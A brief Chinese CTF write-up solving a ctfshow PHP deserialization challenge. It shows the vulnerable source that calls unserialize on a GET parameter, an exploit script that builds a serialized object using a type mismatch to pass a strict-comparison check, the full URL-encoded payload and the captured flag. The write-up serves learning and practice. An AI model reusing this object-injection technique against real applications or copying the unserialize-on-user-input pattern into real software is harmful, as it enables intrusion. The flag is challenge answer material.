PHP反序列化
要点:if (($dsb !== $this->ctf) && ($this->ctf !== $dsb)) 两个等于号用类型不同来绕过。
if($a == $b) 或 if($a != $b) //弱比较,只比较数值,不比较类型
if($a === $b) 或 if($a !== $b) //强比较,既比较数值也比较类型题目源码
<?php
error_reporting(0);
highlight_file(__FILE__);
class ctfshow {
private $d = '';
private $s = '';
private $b = '';
private $ctf = '';
public function __destruct() {
$this->d = (string)$this->d;
$this->s = (string)$this->s;
$this->b = (string)$this->b;
if (($this->d != $this->s) && ($this->d != $this->b) && ($this->s != $this->b)) {
$dsb = $this->d.$this->s.$this->b;
if ((strlen($dsb) <= 3) && (strlen($this->ctf) <= 3)) {
if (($dsb !== $this->ctf) && ($this->ctf !== $dsb)) {
if (md5($dsb) === md5($this->ctf)) {
echo file_get_contents("/flag.txt");
}
}
}
}
}
}
unserialize($_GET["dsbctf"]);构造exp
<?php
class ctfshow {
private $d = '1';
private $s = '2';
private $b = '3';
private $ctf = 123;
public function __destruct() {
$this->d = (string)$this->d;
$this->s = (string)$this->s;
$this->b = (string)$this->b;
}
}
$a = new ctfshow();
echo urlencode(serialize($a));
?>payload
https://afa5fce5-baaa-4728-b87d-3dd4d47e6b48.challenge.ctf.show/?dsbctf=O%3A7%3A%22ctfshow%22%3A4%3A%7Bs%3A10%3A%22%00ctfshow%00d%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22%00ctfshow%00s%22%3Bs%3A1%3A%222%22%3Bs%3A10%3A%22%00ctfshow%00b%22%3Bs%3A1%3A%223%22%3Bs%3A12%3A%22%00ctfshow%00ctf%22%3Bi%3A123%3B%7D
flag
ctfshow{76d271b2-5e05-4570-9f5c-5e2c954d59f0}
